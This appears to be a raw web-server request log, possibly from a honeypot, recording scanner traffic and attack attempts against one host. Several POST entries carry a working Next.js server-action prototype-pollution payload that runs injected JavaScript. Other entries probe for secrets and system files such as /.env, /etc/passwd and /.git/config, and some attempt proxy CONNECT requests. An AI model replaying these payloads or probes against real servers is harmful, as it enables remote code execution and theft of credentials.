User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx631928276986
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:59238
Path: /api
URL: /api
Method: POST
[2026-04-03 12:21:02] === HTTP Request ===
===================
------WebKitFormBoundaryx423220042979--
------WebKitFormBoundaryx423220042979
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx423220042979
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 103709+true+4080842;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx423220042979
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Next-Action: x
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_423220042979
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx423220042979
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:59236
Path: /_next
URL: /_next
Method: POST
[2026-04-03 12:21:01] === HTTP Request ===
[2026-04-03 12:21:01] Main page accessed - IP: 45.205.1.26:59226
===================
------WebKitFormBoundaryx915539055432--
------WebKitFormBoundaryx915539055432
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx915539055432
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 172393+true+5310767;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx915539055432
X-Nextjs-Html-Request-Id: ilovepoop_915539055432
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx915539055432
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:59226
Path: /
URL: /
Method: POST
[2026-04-03 12:21:01] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:38778
Path: /jars
URL: /jars
Method: GET
[2026-04-03 11:24:26] === HTTP Request ===
[2026-04-03 10:27:55] Main page accessed - IP: 104.155.11.101:49798
===================
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 104.155.11.101:49798
Path: /
URL: /
Method: GET
[2026-04-03 10:27:55] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.186.183:9516
Path: /security.txt
URL: /security.txt
Method: GET
[2026-04-03 10:07:32] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.186.183:9396
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-03 10:07:26] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.186.183:9360
Path: *
URL: *
Method: PRI
[2026-04-03 10:07:24] === HTTP Request ===
[2026-04-03 10:07:22] Main page accessed - IP: 66.132.186.183:62888
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.186.183:62888
Path: /
URL: /
Method: GET
[2026-04-03 10:07:22] === HTTP Request ===
[2026-04-03 08:46:18] Main page accessed - IP: 45.91.64.7:60021
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 45.91.64.7:60021
Path: /
URL: /
Method: GET
[2026-04-03 08:46:18] === HTTP Request ===
[2026-04-03 08:21:01] Main page accessed - IP: 176.65.149.45:50862
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:50862
Path: /
URL: /
Method: GET
[2026-04-03 08:21:01] === HTTP Request ===
[2026-04-03 07:44:11] Main page accessed - IP: 172.236.228.202:35584
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.236.228.202:35584
Path: /
URL: /
Method: GET
[2026-04-03 07:44:11] === HTTP Request ===
===================
X-Requested-With: XMLHttpRequest
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:31244
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-03 05:44:05] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:58770
Path: /jars
URL: /jars
Method: GET
[2026-04-03 04:03:02] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.169.49.44:44258
Path: /manager/html
URL: /manager/html
Method: GET
[2026-04-03 03:33:14] === HTTP Request ===
[2026-04-03 03:15:39] Main page accessed - IP: 198.235.24.232:59022
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.232:59022
Path: /
URL: /
Method: GET
[2026-04-03 03:15:39] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 64.89.160.111:1066
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-04-03 02:29:51] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.184.76.209:39419
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-03 02:13:10] === HTTP Request ===
[2026-04-03 02:10:47] Main page accessed - IP: 195.184.76.177:45095
===================
Connection: close
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.184.76.177:45095
Path: /
URL: /
Method: GET
[2026-04-03 02:10:47] === HTTP Request ===
[2026-04-03 01:52:15] Main page accessed - IP: 209.38.70.156:45908
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 209.38.70.156:45908
Path: /
URL: /
Method: GET
[2026-04-03 01:52:15] === HTTP Request ===
===================
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.156 Not(A:Brand/24 YaBrowser/24.4.1.899 Yowser/2.5  Safari/537.36
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.58:8247
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-04-03 01:00:22] === HTTP Request ===
[2026-04-03 01:00:09] Main page accessed - IP: 64.62.156.60:43029
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.156 Not(A:Brand/24 YaBrowser/24.4.1.899 Yowser/2.5  Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.60:43029
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-04-03 01:00:09] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.160 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.65:9053
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-03 00:59:23] === HTTP Request ===
[2026-04-03 00:58:24] Main page accessed - IP: 64.62.156.52:49744
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 YaBrowser/24.1.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.52:49744
Path: /
URL: /
Method: GET
[2026-04-03 00:58:24] === HTTP Request ===
[2026-04-02 21:33:52] Main page accessed - IP: 205.210.31.240:49322
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.240:49322
Path: /
URL: /
Method: GET
[2026-04-02 21:33:52] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.7:50346
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-02 20:47:33] === HTTP Request ===
[2026-04-02 20:47:33] Main page accessed - IP: 85.217.140.7:50340
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.7:50340
Path: /
URL: /
Method: GET
[2026-04-02 20:47:33] === HTTP Request ===
[2026-04-02 16:35:21] Main page accessed - IP: 172.30.0.12:49658
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 104.168.98.195
Accept: */*
Via: 2.0 Caddy
Referer: http://admin.vulnberries.ru/
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49658
Path: /
URL: /
Method: GET
[2026-04-02 16:35:21] === HTTP Request ===
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.18.98:44664
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-02 15:49:38] === HTTP Request ===
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.18.98:44666
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-02 15:49:38] === HTTP Request ===
[2026-04-02 15:49:38] Main page accessed - IP: 64.227.18.98:44658
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.18.98:44658
Path: /
URL: /
Method: GET
[2026-04-02 15:49:38] === HTTP Request ===
[2026-04-02 15:46:39] Main page accessed - IP: 157.230.220.136:46866
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 157.230.220.136:46866
Path: /
URL: /
Method: GET
[2026-04-02 15:46:39] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.249.68.132
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
Accept: text/plain,text/html,*/*
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36134
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-02 15:22:28] === HTTP Request ===
===================
Sec-Fetch-User: ?1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: document
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Sec-Fetch-Mode: navigate
Sec-Gpc: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Referer: http://95.143.191.38:8081/
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Platform: "Linux"
Connection: keep-alive
Sec-Fetch-Site: none
Accept-Language: en-US,en;q=0.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 143.198.39.26:52240
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-02 14:34:24] === HTTP Request ===
[2026-04-02 14:34:24] Main page accessed - IP: 143.198.39.26:52228
===================
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Gpc: 1
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Sec-Fetch-Dest: document
Sec-Fetch-Site: none
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 143.198.39.26:52228
Path: /
URL: /
Method: GET
[2026-04-02 14:34:24] === HTTP Request ===
[2026-04-02 14:00:05] Main page accessed - IP: 176.65.149.45:51410
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:51410
Path: /
URL: /
Method: GET
[2026-04-02 14:00:05] === HTTP Request ===
[2026-04-02 13:57:30] Main page accessed - IP: 207.90.244.20:47698
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.20:47698
Path: /
URL: /
Method: GET
[2026-04-02 13:57:30] === HTTP Request ===
===================
------WebKitFormBoundaryx1128730484959--
------WebKitFormBoundaryx1128730484959
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1128730484959
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 307121+true+3675198;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1128730484959
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1128730484959
X-Nextjs-Request-Id: poop1234
Next-Action: x
X-Nextjs-Html-Request-Id: ilovepoop_1128730484959
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:38308
Path: /api/route
URL: /api/route
Method: POST
[2026-04-02 13:18:16] === HTTP Request ===
===================
------WebKitFormBoundaryx341162118641--
------WebKitFormBoundaryx341162118641
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx341162118641
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 231016+true+1476790;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx341162118641
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_341162118641
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx341162118641
Next-Action: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:38298
Path: /app
URL: /app
Method: POST
[2026-04-02 13:18:16] === HTTP Request ===
===================
------WebKitFormBoundaryx300856056799--
------WebKitFormBoundaryx300856056799
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx300856056799
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 108574+true+2770977;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx300856056799
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_300856056799
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx300856056799
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:38284
Path: /_next/server
URL: /_next/server
Method: POST
[2026-04-02 13:18:15] === HTTP Request ===
===================
------WebKitFormBoundaryx220201503493--
------WebKitFormBoundaryx220201503493
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx220201503493
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 31508+true+6988749;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx220201503493
Connection: close
Content-Length: 517
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_220201503493
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx220201503493
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:38268
Path: /api
URL: /api
Method: POST
[2026-04-02 13:18:15] === HTTP Request ===
===================
------WebKitFormBoundaryx438190375715--
------WebKitFormBoundaryx438190375715
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx438190375715
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 87893+true+4985498;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx438190375715
X-Nextjs-Html-Request-Id: ilovepoop_438190375715
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx438190375715
X-Nextjs-Request-Id: poop1234
Content-Length: 517
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:38256
Path: /_next
URL: /_next
Method: POST
[2026-04-02 13:18:14] === HTTP Request ===
[2026-04-02 13:18:14] Main page accessed - IP: 45.205.1.26:53018
===================
------WebKitFormBoundaryx1189538785--
------WebKitFormBoundaryx1189538785
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1189538785
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 26712+true+44532;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1189538785
X-Nextjs-Html-Request-Id: ilovepoop_1189538785
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1189538785
X-Nextjs-Request-Id: poop1234
Connection: close
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Content-Length: 507
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:53018
Path: /
URL: /
Method: POST
[2026-04-02 13:18:14] === HTTP Request ===
===================
X-Forwarded-For: 74.7.227.48
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
X-Forwarded-Proto: https
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36784
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-04-02 12:22:04] === HTTP Request ===
[2026-04-02 12:21:58] Main page accessed - IP: 172.30.0.12:36784
===================
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Openai-Host-Hash: 867116608
X-Forwarded-For: 74.7.227.48
Via: 2.0 Caddy
From: gptbot(at)openai.com
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36784
Path: /
URL: /
Method: GET
[2026-04-02 12:21:58] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.241.183
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36784
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-02 12:21:58] === HTTP Request ===
[2026-04-02 12:06:50] Main page accessed - IP: 185.247.137.157:59917
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 185.247.137.157:59917
Path: /
URL: /
Method: GET
[2026-04-02 12:06:50] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:38904
Query: import&raw??
Path: /.env
URL: /.env?import&raw??
Method: GET
[2026-04-02 11:18:31] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:53702
Query: import&raw??
Path: /@fs/etc/passwd
URL: /@fs/etc/passwd?import&raw??
Method: GET
[2026-04-02 11:18:28] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:53700
Path: /.json
URL: /.json
Method: GET
[2026-04-02 11:18:25] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:53694
Path: /.git/config
URL: /.git/config
Method: GET
[2026-04-02 11:18:22] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:49832
Path: /Dockerfile
URL: /Dockerfile
Method: GET
[2026-04-02 11:18:19] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:49826
Path: /task.md
URL: /task.md
Method: GET
[2026-04-02 11:18:16] === HTTP Request ===
===================
User-Agent: l9explore/1.2.2
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:49814
Path: /CLAUDE.MD
URL: /CLAUDE.MD
Method: GET
[2026-04-02 11:18:13] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:49812
Path: /.clauderc
URL: /.clauderc
Method: GET
[2026-04-02 11:18:10] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:53928
Path: /login.action
URL: /login.action
Method: GET
[2026-04-02 11:18:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:53920
Path: /server.go
URL: /server.go
Method: GET
[2026-04-02 11:18:04] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
